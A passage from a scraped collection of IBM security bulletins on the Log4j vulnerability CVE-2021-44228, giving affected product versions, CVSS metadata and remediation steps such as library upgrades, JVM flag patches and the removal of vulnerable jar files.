${BIGSQL_CLI_DIR}/BIGSQL/package/scripts/bigsqlPexec.sh -w -c \"rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-api-2.8.2.jar\" \n 5. ${BIGSQL_CLI_DIR}/BIGSQL/package/scripts/bigsqlPexec.sh -w -c \"rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-core-2.8.2.jar\"\n 6. rm -rf /mnt/PV/versioned/uc_dsserver_shared/config/DATAVIRTUALIZATION_ENDPOINT_V1.7.3_20211119_164257.tar.gz /mnt/PV/versioned/uc_dsserver_shared/config/DATAVIRTUALIZATION_ENDPOINT_V1.7.3_20211119_164257.zip\n 7. cp /opt/ibm/qp_artifacts/archives/DATAVIRTUALIZATION_ENDPOINT_V1.7.3_20211119_164257.tar.gz /mnt/PV/versioned/uc_dsserver_shared/config\n 8. cp /opt/ibm/qp_artifacts/archives/DATAVIRTUALIZATION_ENDPOINT_V1.7.3_20211119_164257.zip /mnt/PV/versioned/uc_dsserver_shared/config\n\n## Additional Information\n\nI_f you run a security vulnerability scanning tool on the Docker images, you might find that some of the affected packages at the affected version are still present on it. Those packages have been modified according to guidance provided by the log4j development team so that they are no longer vulnerable._\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n22 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSK1AQ\",\"label\":\"IBM Data Virtualization\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF043\",\"label\":\"Red Hat\"}],\"Version\":\"1.3.0\\/2.5.0, 1.4.1\\/3.0.1, 1.5.0\\/3.5, 1.5.0\\/3.5 Refresh 1 - 9, 1.7.1 - 1.7.3\\/4.0 Refresh 1 - 3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-28T23:01:42", "type": "ibm", "title": "Security Bulletin: IBM Data Virtualization on Cloud Pak for Data is affected by critical vulnerability in Log4j (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-28T23:01:42", "id": "A44F3C58E434BA15FF852853D94A3A21A868AF86E9655A8594367CADBE40A491", "href": "https://www.ibm.com/support/pages/node/6536734", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:35:58", "description": "## Summary\n\nApache log4j 2 library is used by IBM Maximo Scheduler Optimization (MSO). This bulletin provides remediation for the Apache log4j 2 vulnerability (CVE-2021-44228) by performing the applicable steps to the MSO product.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nProduct| Component| Platform| Version| Log4j Version \n---|---|---|---|--- \nIBM Maximo Scheduler Optimization | Application| Platform Independent| 7.6.8.0| \n\n2.13.2 \n \nIBM Maximo Scheduler Optimization | Application| Platform Independent| 8.0.0| \n\n2.13.2 \n \n## Remediation/Fixes\n\n**How to manually get Maximo Scheduler Optimization 7.6.8 (MSO) updated to Apache log4j 2.17.1**\n\nThis manual process updates the Log4j 2 reference inside of the build.gradle file. \n\n \n1) Modify the following build.gradle files: \n \n<mso_home>/maintenance-optimization-framework/mof-execution-service/build.gradle \n<mso_home>/maintenance-optimization-framework/mof-rest-service/build.gradle \n<mso_home>/maintenance-optimization-framework/mof-common/build.gradle \n \nand replace the lines: \n \n_//Logging - Log4j2_ \n_implementation group: 'org.apache.logging.log4j', name: 'log4j-api', version: '2.13.2'_ \n_implementation group: 'org.apache.logging.log4j', name: 'log4j-core', version: '2.13.2'_ \n \nWith: \n \n_//Logging - Log4j2_ \n_implementation group: 'org.apache.logging.log4j', name: 'log4j-api', version: '2.17.1'_ \n_implementation group: 'org.apache.logging.log4j', name: 'log4j-core', version: '2.17.1'_ \n \n2) Execute the build script buildMOF.sh (Linux) or buildMOF.bat (Windows) to rebuild the application archive files. \n \n3) Rebuild the MSO application Docker images and redeploy them to the container registry that is used to host the images. \n \n4) Terminate any currently active MSO API (rest service) or execution service pods so that new pods, using the updated images, are created.\n\n**How to manually get Maximo Scheduler Optimization 8.0.0 (MSO) updated to Apache log4j 2.17.1 **\n\nUpdate the Maximo Scheduler Optimization 8.0.0 installed on Maximo Application Suite (MAS) to Version 8.0.3 of MSO.\n\n### Update **Maximo Scheduler Optimization** application\n\nWhen new versions of applications are available, you can update the deployed applications.\n\nTo update an application:\n\n 1. From the Suite Administration Applications pane, select the Addon tab and find the Maximo Scheduler Optimization application that you want to update.\n 2. On the application summary page confirm the 8.0.3 or > version, click **Update**\n\n## Workarounds and Mitigations\n\nFor MSO 7.6.8 version Update the current Log4j 2.13.2 library with =>2.17.1 reference inside the build.gradle file.\n\nFor MSO 8 version just update to the latest version available after 8.0.3\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSLKT6\",\"label\":\"Maximo Asset Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"7.6.8\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-01T22:33:25", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in Apache log4j versions 2.0 beta 9 - 2.14 (CVE-2021-44228) in IBM Maximo Scheduler Optimization", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-07-01T22:33:25", "id": "207BA1F7EAE0F24909102A8E9F71F4E090F16E370A882E1CE68B1B6EFB5952F4", "href": "https://www.ibm.com/support/pages/node/6527990", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:01", "description": "## Summary\n\nA vulnerability was identified within the Apache Log4j library that is used by IBM Telco Network Cloud Manager to provide logging functionality. This vulnerability has been addressed. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nAgile Lifecycle Manager| 2.x \nIBM Telco Network Cloud Manager - Orchestration (TNCO)| TNC-O 1.1 \nIBM Telco Network Cloud Manager - Orchestration (TNCO)| TNC-O 1.2 \nIBM Telco Network Cloud Manager - Orchestration (TNCO)| TNC-O 1.3.0 \nCloudPak for Network Automation| 2.1 \n \n\n\n## Remediation/Fixes\n\nProduct| VRMF| Remediation/First Fix \n---|---|--- \nIBM Telco Network Cloud Manager - Orchestration (TNCO)| TNC-O 1.1 \n\n~\n\nTNC-O 1.3.0\n\n| \n\nUpgrade to IBM Cloudpak for Network Automation v 2.2\n\n<https://www.ibm.com/docs/en/cloud-paks/cp-network-auto/2.2> \n \nIBM Cloudpak for Network Automation| v 2.1| \n\nUpgrade to IBM Cloudpak for Network Automation v 2.2\n\n<https://www.ibm.com/docs/en/cloud-paks/cp-network-auto/2.2> \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSDSJH\",\"label\":\"IBM Telco Network Cloud Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T15:12:47", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects IBM Telco Network Cloud Manager (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T15:12:47", "id": "C1BEC46524F176FAE4CBB603AC283FC9F12029FC3579BBDE20A1B80FA597B0FC", "href": "https://www.ibm.com/support/pages/node/6536668", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:46", "description": "## Summary\n\nA vulnerability was identified within the Apache Log4j library that is used by Netcool/Omnibus 8.1. This vulnerability is only present when either of the 'Administrator GUI' or 'Operator GUI' features are installed. This vulnerability has been addressed.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nNetcool/OMNIbus| 8.1.0.25 \nNetcool/OMNIbus| 8.1.0.26 \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability by applying the interim fix below:\n\n_Product_| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \nOMNIbus| 8.1.0.27| IJ36502| <https://www.ibm.com/support/pages/node/6483703> \n \n## Workarounds and Mitigations\n\nIBM recommends installing Tivoli Netcool/OMNIbus 8.1.0 fix pack 8.0.1.27 or later.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n16 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSHTQ\",\"label\":\"Tivoli Netcool\\/OMNIbus\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"},{\"code\":\"PF002\",\"label\":\"AIX\"}],\"Version\":\"8.1.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-23T19:00:38", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects Netcool/Omnibus 8.1 (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-23T19:00:38", "id": "628B14B8AA20DB98F73DABE8C7FF0C2746646BE602A0BA4F638FBEE3E634C393", "href": "https://www.ibm.com/support/pages/node/6527948", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:36", "description": "## Summary\n\nThere is a vulnerability in the Apache Log4j open source library used by IBM Financial Crimes Insight for Claims Fraud for generating logs in some of its components. This bulletin provides mitigations for the Log4Shell vulnerability (CVE-2021-44228) by applying the applicable workaround steps to IBM Financial Crimes Insight for Claims Fraud.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nFinancial Crimes Insights Platform | All \nCFM - Banking, Healthcare, Insurance, Government | All \n \n## Remediation/Fixes\n\nThe recommended solution is to apply the fix for Elastic Search and Hadoop as in steps below as soon as possible.\n\n**Steps for Elastic Search:**\n\nTo fix the log4j vulnerability in Elastic Search for IBM Financial Crimes Insight for Claims Fraud, complete the following steps:\n\n 1. Log into OpenShift cluster using `oc login` from Ambari server.\n 2. Ensure all Elastic Search pods are healthy and Running. \n \n oc get po | grep fci-elasticsearch\n \n\n 3. Set the `JVM` property to apply log4j fix. To set, complete the following commands. \n \n oc patch sts fci-elasticsearch-master -p '{\"spec\":{\"template\":{\"spec\":{\"containers\":[{\"name\":\"elasticsearch\",\"env\":[{\"name\":\"ES_JAVA_OPTS\",\"value\":\"-Dlog4j2.formatMsgNoLookups=true\"}]}]}}}}'\n oc patch sts fci-elasticsearch-data -p '{\"spec\":{\"template\":{\"spec\":{\"containers\":[{\"name\":\"elasticsearch\",\"env\":[{\"name\":\"ES_JAVA_OPTS\",\"value\":\"-Dlog4j2.formatMsgNoLookups=true\"}]}]}}}}'\n oc patch sts fci-elasticsearch-client -p '{\"spec\":{\"template\":{\"spec\":{\"containers\":[{\"name\":\"elasticsearch\",\"env\":[{\"name\":\"ES_JAVA_OPTS\",\"value\":\"-Dlog4j2.formatMsgNoLookups=true\"}]}]}}}}'\n\nThe Elastic Search pods are restarted automatically after the commands are executed.\n\n 4. Ensure all Elastic search pods are restarted. \n \n oc get po | grep fci-elasticsearch\n\n 5. Verify if the log4j fix is applied successfully. The JVM process starts with a new JVM argument `-Dlog4j2.formatMsgNoLookups=true`. \n \n oc exec fci-elasticsearch-data-0 -- ps aux\n oc exec fci-elasticsearch-master-0 -- ps aux\n\n**Steps for Hadoop:**\n\nTo fix the log4j vulnerability in Hadoop for IBM Financial Crimes Insight for Claims Fraud, complete the following steps:\n\n 1. Download the [cloudera-scripts-for-log4j-main.zip](<https://github.com/cloudera/cloudera-scripts-for-log4j/archive/refs/heads/main.zip>) file.\n 2. Copy it to all the Hadoop nodes.\n 3. Do the following steps for every Hadoop nodes: \n 1. Copy the `cloudera-scripts-for-log4j-main.zip` file to the `/root/`.\n 2. Run the below commands to extract the `.zip` file: \n \n cd /root\n unzip cloudera-scripts-for-log4j-main.zip\n\n 3. Run the below command and note down the folder names, such as `/usr`, `/fcigraph`, `/grid`, etc. \n \n find / -name log4j*.jar > list_of_impacted_jars.txt\n\n 4. Create a backup folder with the below command. \n \n mkdir /log4j_backup\n\n 5. Run the following command for each folder to apply the fix: \n \n ./run_log4j_patcher.sh hdp -t /usr/ -b /log4j_backup > patch.log 2>&1 &\n\n**Note**: In the above command, replace `/usr/` with the folder names that are found, such as `/fcigraph/`, `/grid/`, etc.\n\nThis process may take 10 to 15 minutes.\n\n 4. Run the following commans to verify: \n \n cd /log4j_backup\n find . -name *.backup\n\n**Note**: This lists all the impacted `.jar` files that are patched, and the list matches the list_of_impacted_jars.txt.\n\n 5. Restart the impacted services from Ambari console (`hive` and `oozie`).\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n15 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Product\":{\"code\":\"SS3QGT\",\"label\":\"IBM Financial Crimes Insight\"},\"Component\":\"FCI, DD, Surveillance, CFM - Banking, Healthcare, Insurance, Government\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"ALL\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T18:24:11", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects the components (Elastic Search and Hadoop) of IBM Financial Crimes Insight for Claims Fraud", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T18:24:11", "id": "2F83AABA00B663AFEF63A77633BECC48724170228D80CF284B2FA6A8E71FE2F8", "href": "https://www.ibm.com/support/pages/node/6527102", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:40", "description": "## Summary\n\nProcess Federation Server (PFS), shipped with IBM Business Automation Workflow (BAW), is vulnerable to a vulnerability caused by log4j. The vulnerability is included in the ElasticSearch client library used by PFS. The ElasticSearch vulnerable library was also shipped in offline documentation. The vulnerable library has already been removed with a prior security bulletin (linked from the Remediation/Fixes section).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Business Automation Workflow| V21.0 \nV20.0 \nV19.0 \nV18.0.0.0.2 \n \nEarlier versions of IBM Business Automation Workflow and of IBM Business Process Manager are affected indirectly through WebSphere Application Server (see link to WebSphere Application Server bulletin in Remediation/Fixes section). If the vulnerable version of Log4j was added or used in custom applications, those customer applications may be affected.\n\n## Remediation/Fixes\n\nPlease follow this [IBM PSIRT blog post](<https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/> \"IBM PSIRT blog post\" ) to keep up to date with additional information on this vulnerability and how it relates to your IBM products.\n\nIBM strongly recommends applying the Interim Fix (iFix) or Cumulative Fix (CF) containing APAR [JR64456](<https://www.ibm.com/support/docview.wss?uid=swg1JR64456> \"JR64456\" ) as soon as practical:\n\n * **Process Federation Server in [IBM Business Automation Workflow](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=All&platform=All&function=aparId&apars=JR64456>) (including fix for IBM Business Process Manager V8.6.0.0 2018.03)**\n\nIf you are using **IBM Business Automation Workflow V18.0, V19.0, V20.0, and V21.0** \n\u00b7 Upgrade to minimal cumulative fix levels as required by iFix and then apply iFix [JR64456](<https://www.ibm.com/support/docview.wss?uid=swg1JR64456> \"JR64456\" ) \n\\--OR-- \n\u00b7 Apply cumulative fix IBM Business Automation Workflow V21.0.3 or later\n\nIf you are using **IBM Business Automation Workflow on Containers,** apply cumulative fix [IBM Business Automation Workflow V21.0.2-IF006](<https://www.ibm.com/support/pages/node/6526316> \"IBM Business Automation Workflow V21.0.2-IF006\" ) or later \n \n\n\nNote that fixes for various versions may become available over time. Upgrading Process Federation Server generally does not require migration. If you are on a version of Process Federation Server using ElasticSearch V7, you can 